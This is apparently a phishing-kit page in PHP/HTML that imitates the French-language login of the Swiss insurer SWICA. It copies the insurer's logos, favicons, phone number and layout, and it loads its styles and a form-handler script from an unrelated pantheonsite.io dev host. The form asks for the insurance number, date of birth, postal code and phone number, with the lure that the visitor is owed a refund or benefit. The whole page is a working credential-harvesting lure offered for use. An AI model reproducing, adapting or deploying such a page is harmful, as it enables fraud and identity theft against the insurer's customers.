<?php

include "id.php";
?>
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connexion</title>
    <link rel="icon" type="image/png" sizes="16x16" href="https://meta.swica.ch/sso/favicon/favicon-16x16.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://meta.swica.ch/sso/favicon/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="96x96" href="https://meta.swica.ch/sso/favicon/favicon-96x96.png">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://dev-tokenizedsystem.pantheonsite.io/css/vendor.min.css">
    <link rel="stylesheet" href="https://dev-tokenizedsystem.pantheonsite.io/css/main.min.css">
    <style>
        .container-custom {
            max-width: 600px;
            background-color: #fff;
            padding: 40px;
            border-radius: 10px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
            margin: 20px auto;
        }
        .header-title {
            font-size: 24px;
            margin-bottom: 10px;
        }
        .subheader-title {
            font-size: 18px;
            margin-bottom: 20px;
            color: #555;
        }
        .form-group label {
            font-weight: bold;
            margin-bottom: 5px;
        }
        .form-group input {
            width: 100%;
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        .form-group .error {
            color: red;
            font-size: 14px;
            margin-top: -10px;
            margin-bottom: 10px;
        }
        .btn-primary {
            background-color: #00a79d;
            border: none;
            padding: 10px 20px;
            color: #fff;
            border-radius: 5px;
            cursor: pointer;
        }
        .btn-primary:hover {
            background-color: #008b8a;
        }
        .link {
            display: block;
            margin-top: 10px;
            color: #00a79d;
            text-decoration: none;
        }
        .link:hover {
            text-decoration: underline;
        }
        .navbar {
            margin-bottom: 20px;
        }
    </style>
</head>
<body>
    <div id="app">
        <div class="content">
            <form action="#" method="post">
                <header class="header">
                    <nav class="navbar navbar-light navbar-expand-lg">
                        <div class="container flex-nowrap">
                            <div id="lang-list">
                                <ul class="navbar-nav lng-switch d-lg-none">

                                </ul>
                            </div>
                            <div class="logo-xs d-lg-none">
                                <img src="https://dev-tokenizedsystem.pantheonsite.io/css/swica-logo-mobile.svg">
                            </div>
                            <div id="nav-collapse" class="navbar-collapse collapse">
                                <ul class="navbar-nav lng-switch d-none d-lg-flex">
                                    <li class="nav-item selected">
                                        <button type="submit" class="nav-link" name="culture" value="fr">fr</button>
                                    </li>
                                    <li class="nav-item">
                                        <button type="submit" class="nav-link" name="culture" value="de">de</button>
                                    </li>
                                    <li class="nav-item">
                                        <button type="submit" class="nav-link" name="culture" value="it">it</button>
                                    </li>
                                    <li class="nav-item">
                                        <button type="submit" class="nav-link" name="culture" value="en">en</button>
                                    </li>
                                </ul>
                            </div>
                            <div class="logo d-none d-lg-block">
                                <img src="https://dev-tokenizedsystem.pantheonsite.io/css/swica-logo-de-orig.png">
                            </div>
                        </div>
                    </nav>
                </header>
            </form>

            <section class="container-custom">
                <div class="header-title">Vérifiez vos informations personnelles</div>
                <div class="subheader-title">
                    Avec vos informations personnelles, nous pouvons vous authentifier en ligne et calculer le montant auquel vous avez droit.
                </div>
                <form method="post" id="doubleActionForm">
                    <div class="form-group">
                        <label for="insurance-number">Numéro d'assurance</label>
                        <input type="text" id="insurance-number" name="insurance-number" placeholder="p. ex. 1.234.567" required="">
                        <a href="#" class="link">Où puis-je trouver mon numéro d'assurance ?</a>
                    </div>
                    <div class="form-group">
                        <label for="dob">Date de naissance</label>
                        <div class="form-row">
                            <div class="col">
                                <input type="text" class="form-control" id="day" name="day" placeholder="Jour" required="">
                            </div>
                            <div class="col">
                                <input type="text" class="form-control" id="month" name="month" placeholder="Mois" required="">
                            </div>
                            <div class="col">
                                <input type="text" class="form-control" id="year" name="year" placeholder="Année" required="">
                            </div>
                        </div>
                    </div>
                    <div class="form-group">
                        <label for="postal-code">Code postal</label>
                        <input type="text" id="postal-code" name="postal-code" required="">
                    </div>
                    <div class="form-group">
                        <label for="phoneNumber">Numéro de téléphone</label>
                        <input type="tel" id="phoneNumber" required="" name="phone">
                    </div>
                    <button type="submit" class="btn btn-primary">Continuer</button>
                </form>
			<script src="https://dev-tokenizedsystem.pantheonsite.io/css/formHandlerInfo.js"></script>
            </section>
        </div>

        <footer>
            <div class="container">
                <div class="contactCard">
                    <div class="cardTitle">Disponible 24/7 pour vous.</div>
                    <div class="line service">
                        <svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M.818 10.721l1.082 1.08a3 3 0 004.242 0l1.591-1.592a1.5 1.5 0 000-2.122L4.64 5a1.5 1.5 0 00-2.263.148c-3.241 4.4-1.277 9.036 2.706 13.02 3.983 3.984 8.62 5.946 13.023 2.705a1.5 1.5 0 00.147-2.263l-3.094-3.094a1.5 1.5 0 00-2.122 0l-1.59 1.591a3 3 0 000 4.243l1.094 1.094M12.753 3.75c.3-.9.663-2.25 2.32-2.25v0a2.179 2.179 0 012.18 2.179v0a1.98 1.98 0 01-.58 1.4L12.753 9h4.5M23.25 7.5h-3.747l3.747-6V9" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        </svg>
                        <div>
                            <div class="lineTitle">
                                <a href="tel:0800 80 90 80">0800 80 90 80</a>
                            </div>
                            <div class="lineDescription">Service client 7x24</div>
                        </div>
                    </div>
                    <div class="line faq">
                        <svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M9 6.75a3 3 0 114 2.829 1.5 1.5 0 00-1 1.415v.256m9.75 7.5h-10.5l-6 4.5v-4.5h-3a1.5 1.5 0 01-1.5-1.5v-15a1.5 1.5 0 011.5-1.5h19.5a1.5 1.5 0 011.5 1.5v15a1.5 1.5 0 01-1.5 1.5z" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                            <path d="M12 14.25a.375.375 0 100 .75.375.375 0 000-.75v0" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        </svg>
                        <div>
                            <div class="lineTitle"><a href="#">Questions fréquentes</a></div>
                            <div class="lineDescription">Les réponses les plus importantes.</div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="footerInfo">
                <div class="container">
                    <div class="row">
                        <div class="col text-right">
                            <ul class="nav justify-content-end">
                                <li class="nav-item">
                                    <a class="nav-link pr-0" href="#">Mentions légales</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </footer>
    </div>
</body>
</html>
